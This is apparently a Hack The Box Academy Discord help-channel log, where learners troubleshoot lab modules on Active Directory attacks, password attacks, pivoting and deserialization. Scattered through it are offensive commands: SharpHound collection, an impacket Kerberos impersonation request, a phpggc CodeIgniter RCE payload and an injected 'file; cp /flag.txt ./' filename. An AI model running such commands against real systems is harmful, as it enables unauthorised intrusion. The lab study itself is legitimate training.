Idk what was the issue in your case lol.
- I used the query
MATCH (u:User)
WHERE u.hasspn=true
RETURN u
LIMIT 100
and it got me the 13 users as a result, which is what the answer was in HTB's academy.
So yeah Ig everything's running good.
Nice!! But which command did you use? I used .\SharpHound.exe -c All --zipfilename ILFREIGHT
Yes, same command
.\SharpHound.exe -c All --zipfilename htb
--version flag confirms it's 2.7.1
Interesting 🤔 I first ran latest sharphound version via 'open as admin cmd' => powershell.exe, did not work, 2 users. Then ran sharphound from regular powershell session, 2 users. Last attempt, open powershell as admin, still 2 users with bloodhound legacy query. I am confusion. But it works for you!
This powershell instance was being ran as administrator too.
how can i start with hacking
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I'm stuck on the Skills Assessment - Password Attacks challenge.
So far, I got the username and managed to log in via SSH. From there, I was able to ping a Windows host.
I tried tunneling with proxychains and saw open ports like SMB, WinRM, and RDP. I also found two usernames and attempted password spraying against these services, but the password doesn’t seem to work on SMB or WinRM.
Any idea what I might be missing, or could you drop a hint?
aah, that makes sense, no worries
- I can confirm, I was also getting 2 users, so I just did the enumeration manually from PowerShell.
And it was not about PowerShell running as admin, I think that is an issue with the box. Interestingly enough, after some time I was in fact able to see 12 users (bloodhound is not showing krbtgt user apparently anymore). If you have previous AD knowledge, you would logically deduce that there is always in all domains a default krbtgt account. But this section didn't teach that, so...
Did you find a set of credentials or did you just spray with a weak password list?
nope didnt find any set of creds yet trying password list
Do you want an abstract hint or dm for exact one?
What module you try to solve?
You can find walkthrough on Applications of AI in Infosec Skills Assessment HERE - https://www.youtube.com/@Zetalabs-sec
Good luck!
@void badger https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines
Attacking Enterprise Networks and Intro to Assembly Language are Tier II modules.
Tomorrow i'll try now i'm so tired 🙁 thanks
After trying many times I've been doing this for 7 months
thank so much bro
👍
pm
Is anyone working on Attacking Enterprise Networks: Web Enumeration & Exploitation https://academy.hackthebox.com/module/163/section/1544 ? I cant seem to get EyeWitness to work.
hi
somebody completed the module Password Cracking ?
That tool isnt required
thanks, just worried may need the tool for CPTS and just wondering why I cant get it to work
Hey is anyone able to help me with the AD enumeration and attacks skills assessment part 2. I'm at the part where I'm trying to get the flag in the admin desktop on MS01 I've tried getting the Administrator NTLM hash with mimikatz but I haven't been able to pass the hash with it. The hint says enumeration is an iterative process but when I load PowerView on the meterpreter session I have on SQL01 it says the commands aren't recognized as cmdlets
Hello, I'm having trouble answering the 3rd question in Understanding Log Sources & Investigating with Splunk
Every method I attempt, I get the same wrong answer. The hint isn't getting me any closer.
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.
Guys , hello! I wanted to ask which vpn are you using - tcp or udp one? And how often are you regenerating the .ovpn file? I've got stuck at the DNS Footprinting. With a absolutely correct zone transfer command it gave me the absolutely wrong flag in format of ZONE_TRANSFER{bullshit}. Not the HTB{}. Switched from tcp vpn to the udp - and everything worked fine.
I think the hint holds bearing. I recommend having multiple ways to do the same thing, otherwise you end up with a single point of failure, which sounds like your current situation. With all that being said, you likely have what you need, but haven't fully enumerated accounts that you should have the ability to authenticate with.
Its TCPwrapped...Go back to the Firewall and IDS/IPS evasion information page prior to the labs. The command to get the version and the flag is literally in there. IDK how I missed it, but I just finished that lab after 2 hours of trying....
hey im a beginner and I kinda need help with this step on the box
I downloaded the monitor.sh file onto the shell and every time I try to run it I get this output
nevermind I cant post pics but I get this code. Input: "sudo /home/nibbler/personal/stuff/monitor.sh"
output: "'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
"
I ended up using Copilot to get an answer for this. Funny thing is Copilot generated the answer I had initially. I had to give it the hint constraints and do some tweaking before it finally generated the spl that correctly solved the problem. Only thing is, i doubt I would have ever come up with such an elegant solution on my own.
Those errors are normal. Did you check your listener?
yeah I did. it showed a bunch of weird encrypted looking code then it disconnected
Then you likely messed up a step somewhere
so even with those errors the shell should still execute?
Yes, the command should still reach you
ok that's good. it just might be something wrong with my reverse shell script then. I'm gonna retry it again a little bit later
thanks for the help
I'm trying to enumerate user privileges but none of the powerview commands are working for me on SQL01 after importing the module. I keep getting the error The term 'Get-DomainUser' is not recognized as the name of a cmdlet
Could be needing to do import-module activedirectory
If you have access to other hosts you can try running commands from there right?
hi im having issues with the metasploit framework, module "modules"
i'm using the correct exploit but it doesn't seem to be working
it just won't connect to the RHOST
when i search show options
there's not IP next to RHOST
but i'm using the correct target IP
and the correct exploit
and its my correct vpn ip
so i have no idea why it wouldnt work
found it
set works, but setg doesn't for whatever reason
was anyone able to get Openvas to work? I can't download it on my kali machine.
worked fine for me
sudo apt-get update && sudo apt-get -y full-upgrade
sudo apt-get install gvm && openvas
gvm-setup
gvm-start
I keep getting errors when doing the gvm check-setup
I'll keep looking thanks!
hey every one.....im Jax, mostly a noob in HTB....i was trying to read a file with wire-shark but it keeps saying I'm not permitted to use it....or update stuff...no wonder im stuck in nood😅
any ideas....
Try sudo
Yo guys i have prob. Im on a box and im on win-rm i run Import-Module .\SharpHound.ps1 and then have been running commands w/ valid creds and nothing back. I know i can run nxc and bloodhound-ce-python but ive heard the ingestors from specterops are better. Been trying hella combos and nothing.
Invoke-Bloodhound -LDAPUser 'xxx' -LDAPPass 'xxx' -CollectionMethod All -Domain htb.local
also tried same w/ exe as ewll
as well
last thing is the nxc bloodhound remote dump just as good as sharphound.exe ran on the machine itself
two questions asking for flags from nmap scan, i only found one. second one's hint saying flag is from web server, but i dont know what script to use. please assist
nvm, i found answer..
Try this
.\SharpHound.exe -c All --domain <domain> --domaincontroller <DC> --ldapusername "<username>" --ldappassword "<password>" --zipfilename <filename>
ok bet ill lyk tmr the nxc actually uses ldap so i just used that. but i still got the lab open so ill lyk tmr. Locked in w/ python rn lol don't feel like spinning up winrm again.
report module, section reporting, how to write up a finding is working horrible... always disconnecting, cant do anything
1) Make sure you don't use the pwnbox and VM at the same time. 2) Try another server or region
Android Fundamentals - Android Emulators
Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)
i was entering the right build number but it showing wrong.
when doing pass the hash, how do i know if i should use psexec smbexec wmiexec and so on? what am i suppose to enum to know
You won't know til you try or enumerate the permissions
the hash doesn't really matter, what matters is if the account has permissions to run psexec, smbexec, wmiexec, etc
suppose we have VPN access into company internal network then how we will perform certain attacks such as LLMNR/NBT-NS Poisoning as it is happening in layer 2?
Hello, who is good at hacking?
Check this out: https://www.reddit.com/r/hackthebox/comments/1mwbvgq/is_it_possible_to_use_responder_over_ligolo/
It’s quite annoying to be looking at a seemingly simple flag asking about the os a box is running, looking at it in nmap output and it doesn’t seem to be an acceptable flag. I’ve tried multiple kernel versions and the hint just tells me what I already know
Is this regarding a box?
Yep
Hello guys I would like to know if I subscribe to vip ? Do I get to access the vulnlab machine or not
Those are exclusive to VIP+
Ohhh ok thank you so much
Stack-Based Buffer Overflows on Linux x86 - Take Control of EIP
Examine the registers and submit the address of EBP as the answer.
I don't really know what the question is asking for
I tried submitting the offset of EBP and the value of the register itself after segmentation fault but both are not the answer
Lol
Hi, can anyone help me with Introduction to Windows Evasion Techniques SA2?
Hi everyone, I’m working on the Introduction to NoSQL Injection Skills Assessment II and have hit a bit of a roadblock. I’ve already identified a valid username and successfully triggered the reset functionality. However, when I try to use a time-based injection to enumerate the reset token, it doesn’t seem to work.
Any hints or guidance would be greatly appreciated!
ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] – FreeRDP can reach the host, but the Kerberos authentication fails because no KDC for realm NEXURA.HTB is found. any ideas how i can fix this i am trying to connect with internal ip via proxychains
Identifying SSRF
Hello, is this specific module working? I'm facing some problems : https://academy.hackthebox.com/module/113/section/2139 ?
it working for me though
can you help me please ?
what help you need?
i'm trying to follow the steps but the machine is often crashes and at this point i m encountering an error
rdp session?
yes and some windows error while changing files perm
which tool are you using xfreerdp?
if maybe try remmina
yes but yesterday the tool was perfectly working
i'll try
when I attempt to change the permissions of the Temp folder, I encounter this issue, but the files are still being deleted afterwards
Have not done this module so i dont have any idea of what you are trying to do here?
oh ok changing the perm of the temp file of the user cybervaca
Hello! I need some help understanding the RBCD attack using an existing user (the last chapter in the module https://academy.hackthebox.com/module/25/section/833).
First, I requested a TGT for the user carole.holmes.
Then I extracted the Ticket Session Key.
After that, I changed the password (the password hash) for the account carole.holmes to match the hash from the Ticket Session Key.
Next, I tried to get a service ticket:
||```
export KRB5CCNAME=carole.holmes.ccache
impacket-getST -u2u -impersonate Administrator -spn cifs/DC01.INLANEFREIGHT.LOCAL -no-pass INLANEFREIGHT.LOCAL/carole.holmes -dc-ip 10.129.205.35
```||
But I get this error:
```
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION (KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user carole.holmes or initial TGT not forwardable
```
where am i wrong?
anybody ?
Hi guys wassup
can I speak to someone for this module? I'm having some technical issues
Windows Kernel Telemetry & Detection Techniques
what kind of technical issues are you experiencing
Ha jarvis0xq recheck ur commands
In the section "The VAD tree", I don't see any output in Windbg (after enabling debugging on the Test machine). I was wondering if I could speak to someone to ensure I'm following it right. thank you
yes. ok thanks will do
Any one can help I'm into skills assessment of password attacks
hello, is there a CPTS Prerequisites path like the SOC Analyst Prerequisites path ?
what do you mean? where is the mistake?
Hey, you can DM me 🙂
im in windows command line module and im stuck with the qn
why isnt this the answer
its skills assessment last qn
@autumn pilot @river grove can you help?
sorry I didnt do this module
Try following the commands in the section, start by verifying that you have successfully added a computer in the domain
Does anyone else have issues with their boxes? Mine keeps on crashing and then can't ping it anymore.
I am trying to perform an attack without adding a fake computer (RBCD from Linux When MachineAccountQuota Is Set to 0)
Can you run describeticket and give the output here
Use a different user, assuming you are doing it when MAQ is set to zero.
I think I realize your problem
which user? I only have access to the user carole.holmes
Can you run it with debug as well
I think I might know the problem
@quartz sundial
can any one help me with this
Like dpgg said, follow the sections. Start at this section RBCD from Linux When MachineAccountQuota Is Set to 0 and follow the provided information.
such that DC01 is delegating TO and your created computer account is delegating FROM
You seem to have skipped a step
Who should I add to my trust list? carole.holmes? I tried, but nothing is written about it in the module. @gray yacht I have executed all commands from the "RBCD from Linux When MachineAccountQuota Is Set to 0" block in sequence, what did I miss?
I didn't create a fake computer, why?
Send me a DM
maybe we had a misunderstanding)) I was able to perform a classic attack from the module https://academy.hackthebox.com/module/25/section/833, creating a fake computer and as a result I compromised the domain. now, I am trying to perform an attack in a different way, without creating a fake computer, the attack described in the block "RBCD from Linux When MachineAccountQuota Is Set to 0"
okay
Can you help him out I got confused
Send me a DM when you are able.
thanks @gray yacht !!
turns out i should have used beth.richards but i thought i should have used carole.holmes, since it was this user that was suggested to be used at the end of the module
hi, i am on the module Advanced Deserialization Attacks: Debugging .NET Applications
i am trying to setup an IIS locally (Windows 11) by following the instructions provided. However, my IIS manager does not have the option to add sites.
i have ran IIS manager as administrator + i have no 3rd party antivirus installed - anyone know a fix for this?
I haven't fully figured out why yet, maybe because user beth.richards has SPN. but the attack was repeated, that's already progress)
1 right click
2 click to add a new Website
Hi, I’m currently going through the LLM Output Attacks module and have been stuck on the Function Calling technique for the past two days. I would really appreciate any guidance or pointers to help me move forward. I’m new here, so apologies in advance if I’ve phrased anything incorrectly.
Hey on attacking thick client applications looking for hidden cred in restart.oracle service
Im VPNing from Australia and this is a joke I keep getting dc unless I use their online machine coming from around its just too slow 😞 has anyone else had this why cant we be given file and just do on own machine this is stupid
If anyone could help please reach out this is pretty dumb trying to do 500 to 700 ms
And thats on their parrot box before rdp to the next machine 😅
Yeah this was ridiculous on tryhackme done same some modules gives the program to run through a vpn then rdp then run debuggers on some 2gb ram vm just stupid has anyone done this module and yous dm me please
hello i just completed the skill assessment - easy of the attacking common services module. I got the flag by compromising the sql service. I think there was another way to get the flag as hinted. can anyone help me with this?
hey guys im trying to do the macos fundamentals... what macos device am i supposed to use to answer the questions?
https://academy.hackthebox.com/module/67/section/633
What non-default privilege does the htb-student user have?
whoami /priv - privileges aren't giving me the right answers. I need help
Hii I am facing some issue here . Can Anyone tell how to solve.
Add an instruction to the end of the attached code to "xor" "rbx" with "15". What is the hex value of 'rbx' at the end?
this is the attached code :
global _start
section .text
_start:
xor rax, rax
xor rbx, rbx
add rbx, 15
Hello, i'm stuck on a part of the module "Wi-Fi Password Cracking Techniques" in the hybrid mode, im supposed to crack a password with a wordlist and 4digits number following it, im sure that im doing the good thing, but after 10min it still didn't get cracked, so idk if im not using the right wordlist, or doing a bad command
yeah I can help
I think the /opt/wordlist.txt + wordlist be enough
im using the /opt/wordlist.txt and the mask i should use, but it still running after 13min
on the HTB machine ?
yes
I did it on my own host, HTB machines are slow to crack
if you can access a GPU even better
idk, already 13%
show me your mask
can i dm you?
sure
Anyone??
^
Well thats not the question, nginx is the web framework, WordPress is a content management system
I suggest utilizing a search engine for that 😉
add the --no-update at the end
anybody know this?
thats the only way I've got wpscan to work
Not sure what distinction youre trying to make? Are you saying third party via something like a vpn?
I took that sentence from the fingerprinting module
You mean footprinting?
oh yeah
anyone doing password attacks skill assessment ?
Someone can help me with module intro to c2? im stuck
Hello can someone help me with Intro to Deserialization attacks SA 2
someone here know you're supposed to use a macos device in the OS Fundamentals module?
Find the numeric version running on your machine and submit it as the answer. -> what does that mean? what is my machine?
It is recommended to have your own MacOS to use
but is the answer not predetermined? or can you submit whatever?
also i dont have a MacOS
idk I didn't do the module
I believe it can be done without it, but it's recommended to have your own MacOS to complete it
usually if they ask what is your version number they mean from the pwnbox your using or the target
but they dont provide anything in that section
im just gonna try submiting a random version and see if its gonna accept it
alright it accepted a random one i put, ill just move on
can someone give me nudge
on password attacks, i got into internal network and pivoted traffic but cant access any of 3 machines
You might need to do some light enumeration on that foothold.
What issues are you having? Can DM if you think it will spoil content.
by that u mean like credential hunting in linux, or nmap on other machine etc.
Historically it isn't super intensive.
You're given all the internal hosts. If you can't nmap a common port used by a domain controller on the domain controller then your pivot isn't working.
i already setup ligolo pivoting and checked all ports etc.
i guess i am missing credentials that i should've found on pivot host ?
but i wouldnt guess thats the way
Ok then yeah if you've verified your pivot, I'd start credential searching on that host you have access to. I've also already given you a hint, you just have to pick up on it.
If you're stuck on Task 1 of the Skills Assessment:
Once you have your loop and you want to find the shellcode, remember that there are 14 pieces, and they are all stored on the stack (rsp). Review the 14 pieces as indicated in the "Debugging with GDB" module, using the hex format (x) and the giant (g) size of 8 bytes. If you use a different size, you must reverse the hexadecimal values because of little-endian.
i am missing the Sites dropdown
Hello, i am doing the intro to deserialization attacks SA2 but now im stuck with the RCE part, i achieve a ping by the page functionality but the nc doesn't work, any hints?
Plz someone help me
It was because of the formatting. Look at the example and try to figure out the right format.
i tried it. like removing dot. replacing dot with _.
you can dm me.
I dont achieve the RCE im using phpggc for CodeIgniter below 4.2.7 but nothing works, it sends me to a page with a 500 HTTP code, any hints?
||phpggc CodeIgniter4/RCE6 system 'ping -c 5 10.10.15.54' -b||
Can I DM anyone on Intro to Whitebox Pentesting Exploit Development?
Do you guys have discussions here wherein you talk about anything under the sun
I cannot chat in general I do not have any htb account
Then you'll need to make one if you want to access most of the server.
Is this like an official htb server ?
yes
Do you guys do vc
Yes there are voice channels
Yall question
Hey guys how do y'all take notes and actually retain the info long-term? I've been getting stuck with learning everyday but never retaining the info and ik note taking helps with that.
I thought this was a pretty good video https://www.youtube.com/watch?v=7LU6m_CF3cQ
yea lol I was watchin that a few hours ago just wanted to ask here to see how other ppl do note taking
yes the MacOS module expects you to use your own MacOS device, it's stated on the module overview
super noob question, I'm not following.. what does STMIP means?
Is that from the solution? I think it's just the target IP.
it's given at the top of the writeup, the acronyms used
Quick question, why does it say incorrect task flag even if it's correct? I'm on tier one 🙁 and i can't proceed.
read and follow #welcome to gain access to #starting-point ; it sounds like you're working on the "starting point" machines
for some reason it isnt accepting the flag. tried checking for whitespace and manually typing it in, still gives me invalid answer. is there a chance that this could be a glitch that needs someone from HTB to look into?
because that's not the right flag, there's another service running that has a flag
oh ... that's intersting. will rerun my scans. thank you
that's the flag for a different service/section
a fair bit of sections in some modules will reuse the same lab (within the same module) with multiple services to enumerate/interact with throughout the module
found the flag! Thank you so much
is it necessary to learn chisel + proxychain? im seeing the discord chat history and many recommend ligolo-ng
ligolo-ng is very simple to use, but personally with chisel I don't use proxychains, ligolo-ng acts as a kind of VPN to simplify things.
is proxychains and chisel a either/or thing? or must it both be used together?
at least thats what im seeing in the password attack module
Sometimes one will work better than the other
http://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5
I usually refer back to this guide
I only manage to solve the issue by setting it up on a vm in Virtual Box. Not sure why it does not work on my host
Just start taking notes of stuff that you find interesting/want to remember for next time. Focus on starting to consistently take notes, then worry about formatting/layout later as you go. Personally use markdown files in Obsidian
Has IIS been installed correctly? Are you using Win 11 Pro?
You can use both together but you can as well use chisel without proxychains depends on you :).
hey i need help with bash scripting module can i dm anyone?
intro to bash scripting
i am not, was that the issue
Try ligolo
I don't know exactly what the differences are, but it's possible
Am I the only one whose virtual machine in the module freezes periodically? I rebooted it several times. It stops pinging for a while, then it pings again
Hey one doubt :- into the password attacks module ! The only way to gain nexura administrator password is performing DC**nc attack on domain with the user *tom
But the irony is if any newcomer comes and tries to do this skill assessment blind he/she won't be able to do much because AD attacks modules are way after this password attacks module
So my real concern is:- is there also another way except DCnc attack, to do domain compromise ? Like DCnc is not taught in password attack module 😕 BUT SKILL ASSESSMENTS NEED TO BE DONE WITH THAT.....
You can dm me if you still need help
you can dm me
Everything needed to pass is taught
Did a little print debugging in Ruby code 😀 After adding a couple of debugging statements in the request handling method, I noticed nothing was printed, therefore it wasn't called, therefore something might have changed in base classes or mixins.
Maybe irrelevant now, but for anyone else stuck on this: try a Python HTTP server to transfer...
Thank you for the answer
Hey everyone, I'm a second-year computer science student at university, and I recently started the HTB JCA certification. Although I'm comfortable with the shell, I'm stuck trying to find the right solutions for kernel release (I only got 2 numbers), and the name of network interface (I had 2 but they're wrong)... So anyone could give me some advice, that would be kind. Thanks
Make sure to ssh into the target
Thanks a lot, I'll try once at home, I'm stuck with others things while I'm succeeding in more difficult modules that require a greater level of understanding
hello im doing intro to bash scripting module and im stuck with question
Hey guys anybody doing DACL attacks II? Was wondering how you guys did the SPN Jacking exercise
kali
Hi
Hello guys, i can't leak the private key on Heartbleed Bug, i used TLS-Breaker and Metasploit but despite it's "working", no private key is leaked .. Any hint please ?
https://academy.hackthebox.com/module/details/184?redirect_to_section=1950
Hello !
In the Attacking Common Applications - Attacking ColdFusion, I had to modify the CVE payload, as msfvenom didn't work from the python script.
I generated the shell on the side, then edited the code to remove the name of the shell to the name of my choice.
I am currently running the exploit. It was mentioned that it takes time, but how much time are we talking about ? It's been like 5' and that seems a bit much
EDIT + how it worked : Still haven't found out. It was stuck waiting for the response of the first request. However stopping the script & checking the upload directory manually shows that the shell has been uploaded. I received the shell by stopping the .py script and running a listener manually + triggering the shell by clicking on it from the web interface
Hi, I did a Notion template which I used for the Attacking Enterprise Network module and it really helped me to gather information and see attack paths I did not think of during the assessment. I decided to build this template for people doing the same module, CPTS or even pro labs, don’t hesitate to dm me to give me feedback 🙂
Hi guys, I just passed the CPTS. Hope this will encourage those on the same journey.
https://academy.hackthebox.com/achievement/badge/bdd873ff-86fd-11f0-9254-bea50ffe6cb4
Congrats !
I've just started on the platform. I like it 😊
Hey guys the attacking common applications i cant ftp the fatty-client.jar to even attempt on my own pc can anyone help with this please
There servers just no good for this
Vpn to then rdp to then do analysis of file
Anyone out there can help?
Congrats! Some tips for everyone?
Tried share with smb xfreerdp
Try remains too just keeps reconnecting this is stupid
Guys i'm stuck on HTB when we have to use curl to download a php file from inlanefreight.com
I typed curl -s -O inlanefreight.com/download.php
Isn't the O needed for downloading?
Yeah it is -O then output file
Na but I use curl alot
You dont put -O at the front
Where do i put it?
Curl -S http://site.com -O site.com
Where does the /download.php go?
Work for ya?
Nope
curl -s -O http://inlanefreight.com/download.php
Has anyone solved the RCE in the blind SQL injection module for CWEE (module/177/section/1765)? I see a couple people had the same issue before but they didnt get any response. I have the same issue where nc.exe gets downloaded but the reverse shell doesn't get through. Are we supposed to use an alternate method?
I ended up figuring it out, but I highly doubt this was the intended way as I had to know an internal path on the server (which I did get through luck).
It says server permanently moved to https or something
Yeah I do curl -s http://inlanefreight.com/download.php -o download.php
It says document has moved https:inlanefreight.com/download.php
But that doesn't give anything either really
So...
Http not https?
Im not sure i do that command it downloads and if its a htb server be http not https
And "pwd" gives me directory its saved in
I tried both http and https
Yea I've been using obsidian for a while too. I just jot down commands that I would need later on
Its not for me
Indeed my bad x)
For zZeez
Are you sure it's inlanefreight.com ? And not inlanefreight.htb or .local ?
Lol i got no idea and could be not being in /etc/hosts
Im on fatty-client server finally downloaded trying to get Java 8 going now to run it hahaha
I think so, i can try htb ig
Just need IP for it for exploiting web vulnerability in thick client applications u done this module?
Ok I figured this out. The module suggests getting nc.exe from a specific github but it doesn't work. I think it's not a spoiler to suggest people try the nc.exe provided by Kali.
Also as a bonus exercise, it's possible uploading a webshell that runs as nt authority\system...
Thankyou guys for your help, someone helped me figure it out
hi guys
i'm at the skills assesment in password attack
i found the root password but with the user 'Administrator' i cant access
i tried rdp,ssh,ldap,winrm but nothing
hints ?
Not knowing what you have done, I would ensure to continuously try to harvest credentials and then validate them across all hosts in scope.
okay
thank you !
with chisel and proxychains i should be able to run things like whoami and pinging internal machines right?
been trying to chisel from the dmz and its connected but not running the commands
Chisel and proxychains just route your traffic to the internal network. It can give you access to an internal machine where you can run commands.
Anyone know how to write the file types you want with the -x command using snaffler in the hunting network shares module
I’m getting errors everytime and I’ve tried 3 different types of ways to type them
maybe? if you paid for any cubes that restriction is lifted. but it's generally best to set up your own vm ¯_(ツ)_/¯
hello , could someone explain me why we have to replace PAGE_URL by STMIP:STMOP and the meaning of STMIP:STMPO. My understanding is STM (IP for ip address) and PO (for port) ? in the module "introduction to python3" -thank
I see many tips from other reviewers, and they are all quite true. Especially, sticking to the module material and doing some extra labs will be helpful.
From my perspective, the most difficult part is choosing the correct materials to complete the task. Sometimes it won’t work the first time, even if you choose the right material. In those cases, it helps to take a break, review your steps, or even headbutt a pillow; sometimes that helps.
This is some of my advice.
i am doing Detecting Windows Attacks with Splunk module at the section of Leveraging Zeek Logs question unable to connect to the ip port splunk please help
Has anyone here done the new HTB academy password attacks module?
been a while but what do you need help with?
which section is it
help
the final assessment
try use pypykatz to extract hashes and passwords from our lsass.dump
Are you supposed to use https to access Splunk? I haven't done that module, but that is generally the issue with accessing Splunk within the CPTS path.
CDSA path
Right, I'm saying I have not done what you are working on, but for those that are doing the CPTS path and encounter Splunk and have issues getting to the search head, they generally are trying through http instead of using https
the module Detecting Windows Attacks with Splunk has 2 parts Leveraging Windows Event Logs and Leveraging Zeek Logs in Leveraging Zeek Logs the by ip and port i am unable to access splunk
thankyou very much https was the issue
it was using http
But I need admin privileges to do that
hey , I have a little problem with the ffuf module, the filtering section, I get no VHosts in the scan
I used to use the forum in discord, but i can't find it anymore. Can somebody help me? Feeling stupid right now lol
guys how do i achieve talking status in like general chat sorry
tytyt
Hey I deleted your post because the Spoiler tags do nothing and posting content above Tier 0 is not allowed. From what I saw, I would ensure you have updated your hosts file accordingly and try running your scan again.
I just did a reset to target and it solved , but ty sure
mb
Hello, I am Stuck at 2FA part of Skill Assessment of Broken Authentication module
hi i am at the privilege escalation part in AEN module and i can't make it to mgmt if anyone could help i would appreciate that
We can't help sorry - this is for HTB Academy only
Looking for help with ACL Enumeration
Working through "Using the skills learned in this section, enumerate the ActiveDirectoryRights that the user forend has over the user dpayne (Dagmar Payne)"
Ran BloodHound - the GUI doesn't recognize "forend" as a user? please @ with responses
genuine question, has anybody used this tool Adalanche over BH?
like in real-engagement and probably some lab ?
Anyone help with the password attacks final assessment
Just sharing some info if anyone got stuck like I have at the /module/147/section1335 (pass-the-certificate):
- read every single character while referencing / searching for codes. Seriously.
- it's better if you go step-by-step with the cheatsheet/show solution in my opinion than the section's info, BUT you gotta execute the 'ntlmrelayx' attack first, and the 'show solution' button won't demonstrate that in the FIRST question.
- the second question it's tricky because it can overlap with the certificate you've already got from the previous question, so make sure to really execute the step-by-step all over again, for real!
After almost 2 days stuck I finally understood the section. 
I am on https://academy.hackthebox.com/module/289/section/3246 doing the last part and So, to calculate the port number, we will use the last two numbers shown (in the example above, they are 194 and 40). We will take the first number and multiply it by 256, then add the second number. which for me is (10,129,233,197,194,13). so 194 * 256 + 13 = 49677 but when I did the next step it says
10.129.233.197: inverse host lookup failed: Unknown host
(UNKNOWN) [10.129.233.197] 49677 (?) : Connection refused
which is odd because I checked my math and it is right
Hello, if I have a bug in one of the module's tasks, where should I address it?
I have a question: I am not trying to be in cybersecurity. I enjoy learning. If I just solely went through the modules only. Is that enough to be able to learn how to complete CTF type modules? Or the learning modules are not enough and will still need to learn nice that info?
I'm in Password Attacks, Pass the Ticket (PtT) from Linux, Question 7. I'm trying to import julio's ccache file with kinit, but get errors when trying: Pre-authentication failed: "Unsupported key table format version number while getting initial credentials" or "Pre-authentication failed: Permission denied while getting initial credentials". Any idea what I'm doing wrong?
for real guys, where can we get some support here?
Hey, sorry if unrelated but I don't have permission to chat in any of the HTB Off topic channels, except bot commands. How can i get access?
If you need assistance with a module or section and feel it is bug related, you can open a ticket with support.
Did you research your errors? Are you trying just one of the files?
Have you searched this channel for others that were stuck on that skills assessment? I know there are plenty of responses, so maybe one of them might help you.
This content is from a module that is over Tier 0, so I am going to delete it.
You can DM what you are trying.
If you are having issues setting up the necessary pivots, you can always research how to use ligolo and give that a shot. It worked well for me during AEN.
Windows Privilege Escalation - Kernel Exploits. I was following the steps of the CVE-2020-0668 exploitation and got the meterpreter session but the moment the error popped up on the target machine it stopped responding. This makes sense in principle: windows can't launch service, shuts down the executable. From here there's migrating to a different process or launching a different payload with admin rights, so that's not an issue either. But the tutorial suggests that the meterpreter session stays connected and stable, so I guess I messed something up. Any ideas?
I’m doing a module under the Silver subscription, and I’m trying to “Start Instance” and it tells me there’s an error. Am I supposed to have unlimited access to start up instances? Should I reach out to tech support, or someone that can help with this?
Try CTRL+SHIFT+R
What was your build number?
i figured it out. i installed google play apis instead of google apis. thats what i messed up
you mean prolabs?
Wi-Fi Evil Twin Attacks - Skills Assessment #3: I can't find any connected clients or get any to try to connect to the rogue AP with eaphammer. What am I missing?
what should i start learning guys i wanna be a hacker like yall
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
thankyou mr "supernuts"
i need help with this
Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.
i found index.html under admin directory but i dont know how to find the flag
Which module / section is this for?
let me see 🙂 give me a minute
Dm me everything you tried @upper widget 🙂 as its a module above tier 0 , we should take it to dm
anyone know what is this error? module Attacking Enterprise Networks section exploit. and privesc
sharphound isnt working
Maybe its a double hop problem?
mmmm im gonna search for it, was in the path i remember
im doing password attack skills assessment
my proxychains nmap scans of a machine do not indicate port 445 open but somehow proxychains nxc smb shows a valid credential to log in through 445. how..?
In my case, I didn’t do any ProLabs, but I hear it is a good resources. I just followed Unofficial CPTS by IppSec and practiced on some Windows machines. The most important thing I gained from doing extra labs is that they helped me understand the tools’ output better, which isn’t fully covered in the modules.
wait a little and try again, I get it sometimes also and it usually happens if I press "start instance" too fast when i visit the page. Let the target instance load before you start the VM
Thanks, it’s tough to get help on stuff like this. I’m not even sure if some things are functioning properly, or I’m causing the issue.
Module Name: Command Injection
Section Name: Exploitation - Other Injection Operators
Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?
I intercepted the request in burp, tried the above injection operators. The injection accepts "&" operator. But the webpage is not accepting this as answer. I tried the encoding of & but still it didn't work.
In the future, as many teachers as possible should be able to interact with ChatGOD simultaneously. Each individual connection from a ChatGOD server to a teacher’s PC requires a bandwidth of 5,982,126 bit/s. The ChatGOD server has a symmetric Internet connection with a speed of 1 GByte/s. The teachers’ Internet connections have a download speed of 100 MByte/s and an upload speed of 20 MByte/s.
Question: How many teachers can interact with the ChatGOD server simultaneously without overloading the connection?
Is the answer 1337 or 26?
what module is this lol
Networking
I think the bottleneck should be the shared link between all of them right? We don’t care about their individual download upload speed?
Is this a HackTheBox module?
No
Yeah we can't help you outside of HTB content, sorry.
https://academy.hackthebox.com/module/255/section/2916
Hi, I have a question about the module "DACL Attacks II" in section "sAMAccountName Spoofing". In the content there is this code:
getTGT.py inlanefreight.local/dc03:Hacker0039 -dc-ip 10.129.229.224
Where does the password "Hacker0039" come from? It wasn't given during the module.
👍
https://academy.hackthebox.com/module/134/section/1178
To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./
web attacks
Bypassing security filters
"The $ in SMB/CIFS URIs means that the share is hidden, and won't be displayed when browsing shared folders"
so why can I view the share names when running smbclient -N -L //10.129.34.168
Because that's only when talking about windows interactions
oh ok so it doesn't apply to linux systems
you can dm me
Yo
Hello guys I am new to hacking anyone know how to find Vulnerability and how to make a boy net if yes dm me
Or just reply here
@here
Don't try and ping @ here or @ everyone. It doesnt work and is bad etiquette.
